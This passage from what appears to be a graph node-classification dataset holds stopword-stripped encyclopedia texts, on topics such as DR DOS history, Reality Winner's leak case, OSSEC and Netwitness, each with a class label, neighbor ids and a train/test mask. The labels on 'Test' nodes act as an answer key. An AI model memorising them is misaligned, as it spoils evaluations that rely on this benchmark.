market microsoft first dr dos version released 28 may 1988 version numbers chosen reflect features relative ms-dos first version promoted public dr dos 3.31 offered features comparable compaq ms-dos 3.31 large disk support fat16b a.k.a bigdos dr dos 3.31 reported ibm pc dos 3.31 internal bdos basic disk operating system kernel version reported 6.0 single-user nature reflecting origin derivative concurrent dos 6.0 multitasking multiuser capabilities well cp/m api support stripped xios replaced ibm-compatible dos-bios system files named drbios.sys dos-bios drbdos.sys bdos kernel disk oem label used digital␠ dr dos offered extended command line tools command line help verbose error messages sophisticated command line history editing history directive well support file directory passwords built right kernel also cheaper license ms-dos romable right start romed version dr dos also named ros rom operating system dri approached number pc manufacturers interested third-party dos prompted several updates system time ms-dos available oems bundled hardware consequently dr dos achieved immediate success became possible consumers buy normal retail channels since 3.4x known versions dr dos 3.31 bdos 6.0 june 1988 oem 3.32 bdos 6.0 17 august 1988 oem 3.33 bdos 6.0 1 september 1988 oem 3.34 bdos 6.0 oem 3.35 bdos 6.0 21 october 1988 oem 3.40 bdos 6.0 25 january 1989 3.41 bdos 6.3 june 1989 oem retail like ms-dos produced several variants different hardware oems kept dr dos name designation one oem version known called ez-dos 3.41 dr dos version 5.0 code-named leopard released may 1990 still reporting pc dos 3.31 compatibility purposes internally indicating single-user bdos 6.4 kernel version 4 skipped avoid associated relatively unpopular ms-dos 4.0 introduced viewmax gem-based gui file management shell viewmax startup screen would present slogan digital research make computers work dr dos 5.0 also introduced patented batterymax power management system bundled disk-caching software drcache remote file transfer tool filelink cursor shape configuration utility cursor offered vastly improved memory management system memorymax compatibility purposes dr dos 5.0 system files named ibmbio.com dos-bios ibmdos.com bdos kernel due advanced loader boot sector could physically stored anywhere disk oem label boot sectors changed ibm␠␠3.3 dr dos 5.0 first dos include load-high capabilities kernel data structures disk buffers could relocated high memory area hma first 64 kb extended memory accessible real mode freed equivalent amount critical base conventional memory first 640 kb pc ram – area dos applications run additionally intel 80386 machines dr dos ems memory manager allowed operating system load dos device drivers upper memory blocks freeing base memory dr dos 5.0 first dos integrate functionality base os loading device drivers upper memory blocks already possible using third-party software like qemm allowed 286 systems supported chipsets 386 systems provide significantly free conventional memory dos drivers mouse multimedia hardware network stack loaded ms-dos/pc dos machine typically might 300 400 kb free conventional memory – little run much late-1980s software contrast dr dos 5.0 little manual tweaking could load still keep conventional memory free – allowing necessary dos data structures much 620 kb 640 kb memmax +v conventional memory region could even extended unused portions graphics adapter card typically providing another 64 96 kb free dos memory dr dos left much conventional memory available old programs utilizing certain address wrapping techniques failed run properly loaded unexpectedly ms-dos impossibly low memory – inside first 64 kb segment known low memory therefore dr dos 5.0 new memmax -l command worked around pre-allocating chunk memory start memory map order programs load barrier less usable conventional memory default memmax configured +l applications could take advantage extra memory faced substantial competition dos arena microsoft responded announcement yet-to-be released ms-dos 5.0 may 1990 would released june 1991 include similar advanced features dr dos included matches dr enhancements memory management almost immediately september 1991 digital research responded dr dos 6.0 code-named buxton dr dos 6.0 already bdos level 6.7 internally would still report ibm pc dos 3.31 normal dos applications compatibility purposes bundled superstor on-the-fly disk compression maximize available hard disk space file deletion tracking undelete functionality roger gross dr dos 6.0 also included task-switcher named taskmax support industry-standard task-switching api run multiple applications time contrast digital research multiuser dos successor concurrent dos multi-user products line would run dos applications pre-emptively multitasked virtual dos machines dr dos 6.0 task switcher would freeze background applications brought back foreground ran x86-machines able swap xms memory 286+ machines taskmax support copy paste facility applications via task-switcher api graphical user interfaces viewmax pc/geos could register task manager menu thereby replace taskmax text mode menu users could switch tasks within gui microsoft responded ms-dos 6.0 matched features dr dos 6.0 since december 1991 pre-release version windows 3.1 designed return non-fatal error message detected non-microsoft dos check came known aard code detection code disabled windows ran perfectly dr dos successor novell dos code present disabled released version windows 3.1 july 1992 digital research japan released dr dos 6.0/v japanese dos/v compatible version dr dos 6.0 korean version appears available well simple matter digital research patch dr dos 6.0 circumvent aard 'authenticity check windows 3.1 beta rearranging order two internal tables memory changes functionality patched version named business update streets within six weeks release windows 3.1 1992 digital research still old name already bought novell july 1991 also embarked spin-off product code-named merlin later released netware palmdos 1 name implies resource-light dr dos 6.0 derivative aimed emerging palmtop/pda market palmdos first operating system family sport new bdos 7.0 kernel native dos compatible internal data structures instead emulations thereof replacing dos emulation top cp/m kernel true dos compatible kernel helped lot improving compatibility applications using dos internal data structures also key reducing resident size kernel code even particular requirement pda market hand introducing genuine current directory structure cds imposed limit depth working directories 66 characters ms-dos/pc dos whereas previous issues dr dos limitation due internal organization directories relative links parent directories instead absolute paths palmdos still reported pc dos 3.31 applications order keep kernel small run compatibility problems windows would expect dosmgr api implemented dos version since 5.0 well rom-executing kernel palmdos palmtop-type support features pcmcia pc cards dpms support power management batterymax idle device driver patented dynamic idle detection gross john p. constant minimax task switcher support pim personal information modules applications stored executed rom via xip execute-in-place etc pcmcia stack palmdos partially written ian h. s. cullimore novell dos novell corporation name dr dos period novell sold dr dos acquisition digital research 1991 regarding features performance typically least one release ahead ms-dos 1993 pc dos 6.1 ms-dos 6.2 pc dos 6.3 trumped novell novell ceo robert j. frankenberg strategy included major trimming selling products like transactional database btrieve killing others novell dos wordperfect multimedia main street children titles novell licensed technology stac electronics use novell dos network operating system netware novell sold product line caldera 23 july 1996 approached novell looking dos operating system bundle openlinux distribution novell dos described techrepublic john sheesley failure marc perkel claimed inspired novell february 1991 buy digital research develop something envisioned novos novell actually bought digital research july 1991 view using dr product line lever comprehensive strategy break microsoft monopoly part massive ultimately disastrous spending spree novell bought wordperfect corporation time borland products invested heavily unix well planned dr dos 7.0 internally named panther intended trump microsoft troubled ms-dos 6.0 repeatedly delayed novell working optionally loadable unix-like multi-user security extension loaded file commands like attrib backup delpurge move touch tree undelete xcopy xdel xdir supporting otherwise disabled /u name command line option select specific users groups compatible multiuser dos two new graphical user interfaces viewmax 3 derivative gem star trek true port apple system 7.1 run new dr dos multitasker named vladivar dr dos eventually arrived december 1993 localized versions released march 1994 renamed novell dos 7 a.k.a nwdos without three components disappointment larger lacked finishing touches germany novell dos 7 aggressively marketed slogan n't trust dos 7 press free demo floppies computer magazines campaign aimed 20 dos market resulted 1.5 million copies sold february 1994 3000 dealers interested carry product novell dos 7 available various oems dedicated mail order shop authorized dealers major functional addition novell second attempt peer-to-peer networking system personal netware pnw better predecessor netware lite nwl incompatible microsoft networking system growing popular support windows workgroups os/2 windows nt considerable amount manual configuration needed get co-exist pc personal netware never achieved much success since novell dos 7 implemented dosmgr api internal data structures updated bdos 7.2 kernel could report dos version 6.0 oem id ibm without risking compatibility problems windows tools would report pc dos 6.1 ibm pc dos 6.1 also reported dos 6.0 applications novell dos 7 introduced much advanced memory management including new support dpmi dos protected mode interface dpms dos protected mode services well flexible loadhigh options also introduced support true pre-emptive multitasking multiple dos applications virtual dos machines vdm component originally named multimax similar multiuser dos basis natively dos compatible environment similar windows 386 enhanced mode without gui default bundled taskmgr would behave similar former dr dos 6.0 taskmax however emm386 loaded option /multi emm386 would load natively 32-bit 386 protected mode operating system core providing api support pre-emptive multitasking multi-threading hardware virtualization domain management virtual dos machines api could used dr dos-aware applications taskmgr run later would use api instance current 16-bit dos system environment create virtual dos machines run applications instead using real mode task-switcher support multitasker compatible windows tasks started launching windows could seen tasks windows well novell dos 7 personal netware 1.0 also shipped netwars network-enabled 3d arcade game novell dos 7 personal netware required several bug-fix releases completely stable next development occurred beta versions microsoft chicago would later become windows 95 sight novell wound development novell dos 7 september 1994 stopped maintenance january 1996 15 updates caldera approached novell looking dos operating system bundle openlinux distribution novell sold product line caldera 23 july 1996 time little commercial value caldera-owned dr-dos competition ibm pc dos 6.3 microsoft moved make impossible use buy subsequent windows version windows 95 dos product claimed purely technical change later subject major lawsuit brought salt lake city caldera help canopy group microsoft lawyers tried repeatedly case dismissed without success immediately completion pre-trial deposition stage parties list evidence intend present out-of-court settlement 7 january 2000 undisclosed sum revealed november 2009 august 1996 us-based caldera inc. approached roger gross one original dr-dos engineers proposal restart dr-dos development make windows 95 run dr-dos would help court case following meeting september 1996 lindon utah gross ransom h. love bryan wayne sparks raymond john noorda gross hired tasked set new subsidiary uk 10 september 1996 caldera announced coming release opendos cod intent also release source code system caldera uk ltd. incorporated 20 september 1996 gross hired original developers operating system novell edc well new talents continue work operating system converted barn periphery andover hampshire uk nearby former digital research novell edc besides improvements enhancements system string new key features added subsequently course next two years including tcp/ip stack derived lan workplace dos netware mobile graphical 32-bit dos protected mode html 3.2 web-browser dr-webspyder originally based source code arachne web browser michal polák lan modem dialup posix pthreads extension multi-tasker andy t. wightman long filename longname support edward n. hill jr. well lba fat32 support drfat32 matthias r. paul gross also hired andrew schulman geoff chappell instrumental identifying aard code 1992 work consultant andover assist paul work winglue secret project create version dr-dos compatible windows 95 98 98 se replace ms-dos 7.xx component demonstrated cebit march 1998 later small team developed winbolt versions dr-dos remained unreleased played important role court case caldera uk officially released caldera opendos 7.01 3 february 1997 version novell dos 7 update 10 december 1994 compiled necessary adaptations incorporate new name display messages well environment variable file names missing year worth patches developed novell dos updates 11 january 1995 15.2 january 1996 due parts novell dos sources lost novell meanwhile consequently version still reported internal bdos version 7.2 identical novell dos 7 new suite also lacked setfifo command added one novell dos updates well fifth generation search destroy virus scanner fastback plus 2.0 utility previously came bundled novell dos instead came bundled newer version pnunpack brought much advanced version netwars parts opendos 7.01 released open source form m.r.s kit machine readable sources may 1997 license terms mostly incompatible existing open-source licenses source closed gross felt would undermine commercial aspirations system beta releases september november 1997 next official release came december 1997 name changed caldera dr-opendos 7.02 soon followed release march 1998 dr-dos name returned caldera dr-dos 7.02 first time written hyphen version 7.02 reporting bdos 7.3 incorporated improved bios bdos issues developed paul adding many new boot configuration options integrating many compatibility enhancements bug-fixes optimizations size speed re-implementing fixes missing novell dos updates bios improved coexistence dr-dos windows 9x support third-party disk compression drivers microsoft drivespace introduced diagnostics mode activated scroll lock integrated debugger support debug=on debugger loaded within config.sys flexible config.sys tracing capabilities via /// hotkeys trace timeout commands thereby also improving integration alternative command line shells 4dos together loader sys /dr ext chain directive brought enhanced multi-configuration support dr/d/config.ext files came enhancements basic-like config.sys language powerful boot menus convenient user interaction programmatical acting upon conditions cpu386 return codes error levels error onerror also allowed change scrollock capslock insert verify settings well switchar yeschar nochar resumechar characters various behavioural details could controlled new parameters /q quiet /l lowercase /y yes /s switch switches provided optional support lpt4 device allowed configure built-in comx lptx devices well change prn aux defaults handling environment variables config.sys improved new load-high facilities included hifiles/fileshigh hifcbs/fcbshigh options relocate file handles fcb structures umbs typically gave 1 4 kb 15 kb free conventional memory compared previous versions hishell/shellhigh size directive control pre-allocation hma memory command.com helped avoid memory fragmentation thereby typically gave 5 8 kb continuous hma memory hma-capable third-party drivers work conjunction third-party command line shells could load hma command.com /mh option reduced memory footprint version 7.02 also brought enhanced nls 4.xx sub-system paul allow multiple distributed possibly user-configured country.sys files used system time hierarchical model also gave dynamic parser support ms-dos/pc dos country.sys file formats addition dr-dos country.sys formats introduced support iso 8601 international date format including automatic detection then-new euro currency dr-dos files ibmbio.com ibmdos.com country.sys carried misleading file extensions compatibility reasons dr-dos 7.02 enhanced incorporate fat binary-style safety feature devised paul would exit gracefully called inappropriately dr-dos 7.02 fully year 2000 compliant provided special support work buggy system bioses also came updated fdisk could partition format fat32 volumes yet work lba sources novell patches external tools drivers meanwhile found germany could thus retro-fitted system well dr-dos 7.02 finally caught novell dos 7 true step forward release followed various updates june august september 1998 updated internal bdos version number introduced new problem legacy third-party applications special support novell dos longer updated stopped working setver already allowed novell dos disguise dos versions file name globally specifying magic sub-version 255 would even disable internal bdos version check order cope programs specifically probing dr-dos modified kernel setver driver paul would hierarchical model also support load paths order distinguish multiple executables file name introduced extended mode setver could fake dos versions also bdos kernel versions sub-versions 128 255 would reported dos sub-versions 0 127 applications bdos version check disabled sub-versions 100 127 could used fake different bdos versions whereas dos revision number typically set 0 static pre-boot patchable data structure would taken reported sub-version instead setver /g /x 6.114 would allow versions dr-dos since 7.02 still report dos 6.0 faked bdos version 7.2 114 decimal 72 hexadecimal thereby masquerading novell dos 7 opendos 7.01 otherwise beneficial new hifiles triggered compatibility problem dos-up feature third-party memory manager qemm 8 hard-wired expect chunk five handle structures conventional memory dr-dos previous versions 7.01 whereas version 7.02 design left eight handles low memory loading high files order maintain full compatibility older versions windows 3.xx compatibility windows workgroups 3.11 affected maintenance fix devised patch single byte ibmbio.com order switch behaviour optionally re-invoke old chunking freed 150 bytes conventional memory enabled full compatibility dos-up time broke compatibility older versions windows 3.xx using hifiles feature vice versa patch named ibmbio85.scr continued work newer versions dr-dos august 1998 us-based caldera inc. created two new subsidiaries caldera systems inc. linux business caldera thin clients inc. embedded thin-client market another version dr-dos 7.03 still bdos 7.3 reporting applications pc dos 6.0 compatibility purposes pre-released christmas 1998 officially released 6 january 1999 caldera uk came significantly improved memory managers particular enhanced dpmi support conjunction multitasker enhancements added devload drmouse utilities changed oem label boot sector volumes formatted dr-dos could also cause problems operating systems circumvented novoltrk dr-dos 7.03 would become last version dr-dos also tailored desktop use caldera inc. wanted relocate dr-dos business us closed highly successful uk operation february 1999 gross resigned set icentrix develop marionet split web browser development moved us never worked due total lack expertise field caldera us dr-dos line fell branch company caldera thin clients renamed lineo inc. 20 july 1999 dr-webspyder renamed embrowser said ported linux lineo re-released dr-dos 7.03 june september 1999 still branded caldera dr-dos without changes otherwise focussed linux embedded systems based stripped-down version openlinux named embedix among latest independently-developed versions dr-dos oem dr-dos 7.04 19 august 1999 7.05 30 november 1999 still branded caldera dr-dos variants system consisting kernel command shell specialized native implementation fat32 large hard disk support could found bundled ontrack easy recovery 5 2000 replacing dynamically-loadable drfat32 redirector driver still came easy recovery 4 also used seagate technology seatools cd imaging software nero burning rom still reporting bdos 7.3 internally first versions report pc dos 7.10 applications order indicate integrated fat32 support designed mostly backwards-compatible dr-dos 7.04/7.05 ibmbio.com could combined dr-dos 7.03 ibmdos.com order give desktop-approved dr-dos 7.03 kernel lba capabilities work drives larger 8 gb specific oem requirements dr-dos 7.06 14 december 1999 wightman combined kernel files single binary executable similar io.sys windows 98 could booted ms-dos 7.10 boot sectors longer dr-dos boot sectors dr-dos 7.07 bdos 7.4/7.7 paul introduced new bootstrap loaders updated disk tools order combine support chs lba disk access fat12 fat16 fat32 file systems differing bootstrapping conventions dr-dos pc dos ms-dos windows real/32 loader single newldr mbr boot sector code would continue load version dr-dos 3.31 since dr-dos 7.04 also fat32 support could also used launch pc dos ms-dos system files including windows 9x pc dos 7.10 time kernel could booted new sectors also previously dr-dos formatted disks well disks existing pc dos ms-dos boot sectors variety boot-loaders thereby easing coexistence setup multi-boot scenarios conjunction operating systems 2002 lineo bought lineo former managers purchased name formed new company drdos inc. dba devicelogics l.l.c continued sell dr-dos use embedded systems dr-dos 8.0 released 30 march 2004 featuring fat32 large disk support ability boot rom flash multitasking dpmi memory manager version based kernel version 7.03 company later released dr-dos 8.1 better fat32 support autumn 2005 version instead based opendos 7.01.xx dr-dos 8.1 withdrawn gpl violations see controversies aside selling copies operating system drdos inc. website lists buyout option dr-dos asking price opendos 7.01 source code base dr-dos/opendos enhancement project set july 2002 attempt bring functionality dr-dos parity modern pc non-windows operating systems project added native support large disks lba fat32 file system several enhancements including improved memory management support new fat32+ file system extension allows files 256 gb size normal fat partitions dr-dos 7.01.08 released 21 july 2011 october 2005 discovered dr-dos 8.1 included several utilities freedos well sources kernel outdated version enhanced dr-dos kernel dr dos inc. failed comply gnu general public license gpl crediting freedos utilities authors including source code complaints freedos developers including suggestion provide source code hence comply gpl dr dos inc. instead withdrew version 8.1 also unaffected 8.0 website append assign batch dbg delq era eraq subst among internal commands supported since dr dos 3.31 dr dos 5.0 removed batch added hiload gosub idle return switch added internal commands dr dos 6.0 assign subst changed become external commands dr dos 6.0 echoerr pauseerr existed internal commands dr dos 6.0 multiuser dos normally enabled remained internal command including palmdos changed external command novell dos 7 dbg removed novell dos 7 loadhigh lh truename added internal commands append still internal command dr dos 6.0 changed external command novell dos 7 following list internal commands supported dr dos 6.0 batch processing subcommands dr dos 6.0 include dr dos 6.0 supports following external commands",
    "neighbors": [
      6148,
      10253,
      10257,
      6675,
      7187,
      10776,
      25,
      8729,
      4125,
      4637,
      10273,
      9762,
      7204,
      5158,
      7217,
      8241,
      9784,
      10809,
      576,
      10333,
      97,
      5220,
      8298,
      8301,
      2672,
      9329,
      7285,
      4727,
      2168,
      9335,
      6778,
      1147,
      9340,
      3197,
      1150,
      5762,
      2179,
      4228,
      10883,
      6797,
      3216,
      2193,
      9366,
      6296,
      2201,
      7325,
      9887,
      7847,
      2729,
      7849,
      5293,
      3248,
      178,
      9907,
      6837,
      7356,
      8388,
      9932,
      5840,
      7890,
      1237,
      1750,
      7382,
      8410,
      9946,
      5856,
      2786,
      1253,
      6377,
      6893,
      5359,
      4337,
      4850,
      5363,
      11513,
      2811,
      3323,
      10499,
      4870,
      6921,
      1804,
      3856,
      273,
      8976,
      11539,
      2840,
      6939,
      10016,
      292,
      808,
      2345,
      11562,
      7983,
      5425,
      9525,
      823,
      4409,
      7483,
      7999,
      11075,
      8517,
      4423,
      2380,
      11598,
      5457,
      11601,
      10067,
      10068,
      4441,
      10590,
      10083,
      8551,
      10087,
      6506,
      5492,
      2933,
      6521,
      1408,
      10113,
      1922,
      7046,
      394,
      3978,
      7057,
      11667,
      8092,
      421,
      7088,
      11184,
      8115,
      6075,
      6078,
      3007,
      9151,
      6082,
      4548,
      8136,
      9166,
      4563,
      5080,
      6104,
      2015,
      11232,
      2534,
      1515,
      5612,
      6128,
      6129,
      2545,
      3056,
      499,
      5619,
      10235
    ],
    "mask": "Test"
  },
  {
    "node_id": 179,
    "label": 4,
    "text": "Tamer_Şahin:tamer şahin tamer şahin born august 10 1981 i̇zmir turkey turkish hacker şahin interest computers started 13 years old first hacked internet service provider superonline caused system service 7 days 1999 late 2001 put court claim hacking one oldest banks turkey osmanlı bankası part garanti bank left t.ş message website bank also published personal photos customers kept bank systems several national print visual media covered charges dismissed due lack evidence entered systems microsoft network operations center 2002 published personal e-mails bill gates steve ballmer also secret documents hotmail projects internet emphasized professional business life studies information security still go published nearly 50 security announcements various sources life experience handled projects istanbul technical university işık university istanbul american collegiate institute izmir studies social reflections analysed documents presentations lesson scopes şahin lectures hacker philosophy universities gives consultant services firms information security contracts stay always confidential information security wrote life story book called hacker'ın aklı book published doğan kitap documentary film made coskun aral team şahin life hackers şahin writes columns technology magazine t3 turkey",
    "neighbors": [
      4956
    ],
    "mask": "None"
  },
  {
    "node_id": 180,
    "label": 4,
    "text": "Reality_Winner:reality winner reality leigh winner born december 4 1991 former american intelligence specialist 2017 charged removing classified material government facility mailing news outlet material question originated national security agency nsa june 3 2017 employed military contractor pluribus international corporation winner arrested suspicion leaking intelligence report russian interference 2016 united states elections news website intercept report suggested russian hackers accessed least one u.s. voting-software supplier concerns raised intercept sloppy handling material exposed source contributed arrest twice denied bail winner held lincoln county jail lincolnton georgia august 23 2018 winner sentenced five years three months prison part plea deal winner grew kingsville texas 2010 graduate h. m. king high school learned arabic played soccer tennis teams winner served united states air force 2010 2016 achieving rank senior airman e-4 paygrade 94th intelligence squadron two years language intelligence training posted fort meade maryland worked cryptologic linguist fluent persian language dari persian dialect spoken afghanistan well pashto assigned drone program listened intercepted foreign chatter provide u.s. forces intelligence winner awarded air force commendation medal aiding 650 enemy captures 600 enemies killed action identifying 900 high value targets month honorably discharged air force november 2016 winner moved augusta georgia taught crossfit yoga studio still possessing top-secret security clearance winner hired pluribus international corporation small firm provides services contract national security agency february 13 2017 pluribus assigned work fort gordon u.s. army post near augusta stationed air force assigned translate documents relating iran aerospace program persian winner employed pluribus time arrest unauthorized disclosure classified documents february 11 2017 two days began employment nsa contractor wrote twitter account dangerous entry country orange fascist let white house described president donald trump soulless ginger orangutan facebook page prior 2016 presidential election posted positive note tuesday become united states russian federation olympic lifting national sport federal agents found diary search home allegedly expressed support taliban leaders osama bin laden u.s. magistrate judge presided winner bail hearing said seems fascination middle east islamic terrorism quoted writing christlike vision fundamentalist islamic state however one prosecutors bail hearing said government way suggesting defendant become jihadist taliban sympathizer winner arrested june 3 2017 u.s. department justice announced arrest june 5 shortly intercept published article describing russian attempts interfere 2016 presidential election hacking u.s. voting software supplier sending spear-phishing emails 100 local election officials days november 8 election intercept story based top-secret may 5 2017 national security agency nsa document leaked anonymously intercept contacted nsa may 30 sent copies documents order confirm veracity nsa notified fbi situation june 1 according media coverage published vice official report fbi noted documents appeared folded and/or creased suggesting printed hand-carried secured space next nsa internal audit confirming winner one six workers accessed particular documents classified system winner computer contact intercept using personal email account june 3 fbi obtained warrant search winner electronic devices arrested journalists security experts suggested intercept handling reporting included publishing documents unredacted including printer tracking dots used identify winner leaker 'affidavit support application arrest warrant dated july 5 2017 fbi special agent justin c. garrick stated julian assange founder wikileaks called public support winner offering 10,000 reward information reporter intercept allegedly helped u.s. government identify winner leaker assange wrote twitter winner clapper petraeus 'elite immunity young woman wall talking press winner charged removing classified material government facility mailing news outlet june 8 2017 pleaded guilty charge willful retention transmission national defense information denied bail prosecutors alleged may involved leaks classified information might try flee country released u.s. justice department lawyers also argued defense team allowed discuss classified information even news reports published media august 29 2017 winner attorneys filed motion u.s. district court suppress statements law enforcement arguing winner read miranda rights interrogated fbi june 3 october 5 2017 judge brian epps denied second request defense attorneys bail set december 2017 intercept reported winner defense team allowed discuss case including classified aspects sensitive compartmented information facility scif first look parent company intercept helped fund defense january 31 2018 u.s. court appeals eleventh circuit affirmed lower court order blocking winner posting bond determining combination conditions would reasonably assure presence trial thus ensuring remains jail trial scheduled begin october 15 2018 stand reality campaign formed representatives courage resist electronic frontier foundation freedom press foundation goal raising public awareness ensure reality winner receives fair trial billie winner-davis mother reality winner called members public join campaign june 21 2018 winner asked court allow change plea guilty june 26 pleaded guilty one count felony transmission national defense information winner plea agreement prosecutors called serve five years three months prison followed three years supervised release august 23 2018 federal court georgia winner sentenced agreed-upon five years three months prison violating espionage act prosecutors said sentence longest ever imposed federal court unauthorized release government information media new york times reported plea agreement ms winner transferred federal bureau prisons federal medical center carswell fort worth texas receive treatment bulimia relatively close family held carswell release date december 29 2021 august 24 president trump tweeted ex-nsa contractor spend 63 months jail 'classified information gee 'small potatoes compared hillary clinton unfair jeff double standard winner expressed appreciation support saying ca n't thank enough august 31 winner said ask trump clemency result tweet legal team already working pardon application 2019 tina satter staged play room based transcript winner interview fbi april 2019 band son volt released song titled reality winner new album union",
    "neighbors": [
      7887,
      4956,
      3495
    ],
    "mask": "None"
  },
  {
    "node_id": 181,
    "label": 3,
    "text": "Starquake_(video_game):starquake video game starquake action-adventure platform game written stephen crow zx spectrum published bubble bus software 1985 ported commodore 64 msx amstrad cpc atari 8-bit family tatung einstein 1985 bbc micro 1987 ibm compatibles atari st 1988 player controls blob bio-logically operated whose mission penetrate unstable core rogue planet appeared black hole core repaired within set time limit implode causing chain reaction destroy entire universe planet inhabited various primitive creatures hazardous touch remnants previous civilisation provides items needed rebuild stabilise planet core within game multiple ways get around blob able carry four items using fifo arrangement items encountered useful repair core others need exchanged using cheops pyramid something useful access credit card fill numbered chips needed get security doors using aforementioned pyramid also key used open doors well items needed repair core access card key items top blob energy platform building capacity firepower one cylinder like object top whichever level lowest even add life blob last blob also top lives moving joysticks extra life points scored shooting various moving hazardous creatures worth 80 320 points 10,000 points per core item replaced 250 points scored time blob enters new screen also hazards dangerous spikes energy fields kill blob contact mines move around like creatures game features play area 512 screens placement objects identities needed fix core randomized start game map/screens including locations teleport booths remain fixed destination codes nine core elements replace order complete game zx spectrum version ranked 27th sinclair official top 100 games time 10th retro gamer magazine top 25 spectrum games 2018 starquake amiga port starquake released",
    "neighbors": [
      9166,
      9006,
      7536,
      6129,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 182,
    "label": 4,
    "text": "Vouch_by_Reference:vouch reference vouch reference vbr protocol used internet mail systems implementing sender certification third-party entities independent certification providers vouch reputation senders verifying domain name associated transmitted electronic mail vbr information used message transfer agent mail delivery agent email client protocol intended become standard email sender certification described rfc 5518 user vbr email certification service signs messages using domainkeys identified mail dkim includes vbr-info field signed header sender may also use sender policy framework authenticate domain name vbr-info header field contains domain name certified typically responsible domain dkim signature d= tag type content message list one vouching services domain names services vouch sender kind content email receiver authenticate message domain name using dkim spf thus finding domains responsible message obtains name vouching service trusts either among set supplied sender locally configured set preferred vouching services using domain name system receiver verify whether vouching service actually vouches given domain receiver queries codice_1 resource record name composed returned data space-delimited list types service vouches given lowercase ascii match self-asserted message content types defined codice_2 codice_3 codice_4 auditing message may allow establish whether content corresponds result authentication saved new header field according rfc 6212 like opendkim mdaemon messaging server alt-n technologies among first software implementations vbr opendkim provides milter well standalone library roaring penguin software canit anti-spam filter supports vbr version 7.0.8 released 2010-11-09 spamhaus released spamhaus whitelist includes domain based whitelist dwl domain name queried e.g. codice_5 although standard specifies codice_1 resource records following long established dnsbl practice spamhaus also assigned codice_7 resource records values 127.0.2.0/24 whitelist return codes possibility query address may allow easier deployment existing code however techfaq recommends checking domain value codice_8 tag valid codice_9 querying corresponding codice_1 record howto gives details inserting codice_11 header fields messages signed whitelisted domains 2013 one protocol authors considered flop",
    "neighbors": [
      8224,
      2887,
      2472,
      8202,
      914,
      4793,
      1658
    ],
    "mask": "None"
  },
  {
    "node_id": 183,
    "label": 4,
    "text": "Johannes_Ullrich:johannes ullrich johannes ullrich founder dshield dshield part sans internet storm center leads since created incidents.org dshield back 2001 2005 named one 50 powerful people networking network world magazine dean research instructor sans institute johannes grew germany moved us obtained ph.d. physics university albany work x-ray optics awarded number research grants nasa department energy also authored chapter handbook optics",
    "neighbors": [
      6097,
      4467,
      10437
    ],
    "mask": "Test"
  },
  {
    "node_id": 184,
    "label": 4,
    "text": "Netwitness:netwitness netwitness corporation reston virginia-based network security company provides real-time network forensics automated threat analysis solutions flagship product netwitness nextgen 2011 netwitness acquired emc corporation later integrated line products rsa security mid-1990s netwitness technology established ctx corporation washington d.c. based system integrator technology initially chartered us government research project created help analysts better understand large volumes captured network data various types investigations ctx corporation subsequently acquired mantech international corporation december 2002 mantech technology developed aid federal law enforcement criminal investigations support professional service engagements federal government commercial organizations november 2006 netwitness corporation spun mantech nick lantuh brought run netwitness product group execute spin independent company netwitness focused bringing network analysis technology worldwide market since spin netwitness focused products support deep real-time network situational awareness agile network response february 2010 netwitness announced discovery major zeus botnet infestation impacting roughly 2,400 companies across globe company dubbed botnet “ kneber zeus botnet ” criminal gang involved news went viral shed light continued vulnerabilities world ’ corporate information security practices provided deep dive understanding inner-workings botnet netwitness visualize announced july 2010 provided revolutionary way visualize network traffic august 2010 netwitness named 21st fastest growing private company united states annual inc 500 report 7,745.8 percent three year growth company also ranked fastest growing privately held enterprise security product company fastest growing company washington d.c. area april 1 2011 netwitness acquired emc corporation undisclosed amount former netwitness products integrated emc security division rsa security netwitness ’ ceo amit yoran formerly director department homeland security ’ national cyber security division netwitness also employed shawn carpenter notable security analyst discovered operation titan rain 2005",
    "neighbors": [
      2154,
      11611,
      1111,
      10297,
      11195,
      5087
    ],
    "mask": "Test"
  },
  {
    "node_id": 185,
    "label": 8,
    "text": "Net_Applications:net applications net applications web analytics firm company commonly known web browser development technology news communities global market share statistics since 1999 net applications source applications webmasters emarketers headquartered aliso viejo california net applications distributes services 7,000 partners affiliates net applications known provider usage share statistics web browsers operating systems provides services product market share statistics available month-to-month basis free also available hourly statistics paid service freely available statistics stretch back november 2007 though data stretches back least q4 2004 august 2009 net applications began weighting raw data based number internet users countries concerned using data cia changes applied retroactively older data net applications measures browser usage tracking machines visit 40,000 sites monitors clients results pool 160 million unique visitors per month statistics released company routinely place operating systems sold microsoft windows apple mac os x high market share desktop computer category 2013 vincent vizzaccaro evp – marketing strategic alliances net applications 2002–present stated microsoft apple among company clients company also admitted statistics skewed admissions fact company n't make data sources processing methods public led criticize company questioning impartiality reliability statistics",
    "neighbors": [
      1664,
      6528,
      6657,
      3971,
      3462,
      7943,
      8584,
      3978,
      6028,
      6797,
      2579,
      7572,
      7965,
      9757,
      8351,
      10910,
      7713,
      5026,
      1834,
      9770,
      7340,
      559,
      6576,
      9908,
      4661,
      3639,
      11449,
      4797,
      64,
      10057,
      11466,
      5707,
      7885,
      4048,
      10834,
      4310,
      5078,
      6231,
      8281,
      6747,
      8923,
      737,
      5605,
      4326,
      487,
      8169,
      1642,
      9834,
      8557,
      494,
      1520,
      7152,
      115,
      9843,
      6133,
      4728,
      5114,
      8443
    ],
    "mask": "None"
  },
  {
    "node_id": 186,
    "label": 4,
    "text": "OSSEC:ossec ossec open source hids security free open-source host-based intrusion detection system hids performs log analysis integrity checking windows registry monitoring rootkit detection time-based alerting active response provides intrusion detection operating systems including linux openbsd freebsd os x solaris windows ossec centralized cross-platform architecture allowing multiple systems easily monitored managed ossec log analysis engine able correlate analyze logs multiple devices formats ossec compliant payment card industry data security standard pci dss requirements june 2008 ossec project copyrights owned daniel b. cid project leader acquired third brigade inc promised continue contribute open source community extend commercial support training ossec open source community may 2009 trend micro acquired third brigade ossec project promises keep open source free 2018 trend released domain name source code ossec foundation ossec project currently maintained atomicorp stewards free open source version also offers enhanced commercial version ossec consists main application agent web interface since 2017 atomicorp running annual ossec conference active developers members community get together discuss ossec future 2019 ossec con held march 20-21st outside washington dc slides materials conference available",
    "neighbors": [
      4772,
      3717,
      6372,
      7813,
      6559,
      5612,
      5981,
      6092,
      6606,
      6797,
      7983,
      9791,
      11407,
      823,
      7035,
      5245,
      2558,
      127
    ],
    "mask": "None"
  },
  {
    "node_id": 187,
    "label": 9,
